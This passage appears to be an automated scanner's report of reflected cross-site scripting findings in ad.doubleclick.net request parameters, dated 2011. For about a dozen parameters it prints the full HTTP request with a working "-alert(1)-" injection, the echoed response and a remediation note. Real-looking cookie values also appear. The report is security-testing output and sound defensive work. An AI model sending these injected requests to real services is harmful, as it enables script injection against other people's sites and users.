GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http:// ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9cf4"-alert(1)-"67ea7960a5 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... p://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q10000001403000 ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd56a"-alert(1)-"5892d568ade was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568ade HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568adehttp://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcall ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1263e"-alert(1)-"fe5cbeb2d43 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=n ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ab5"-alert(1)-"f00fa922e97 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 48%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwY ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99b24"-alert(1)-"62791cafedf was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23. ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d07"-alert(1)-"853a60c8716 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7/166/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76fd8"-alert(1)-"b133118e764 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... s%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q10000 ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de79b"-alert(1)-"244fdf90e7b was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNA ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14b30"-alert(1)-"7bf3c7cc635 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... /e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc97"-alert(1)-"306082136f6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN201"); var fscU ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2ce"-alert(1)-"9cfe988ae87 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
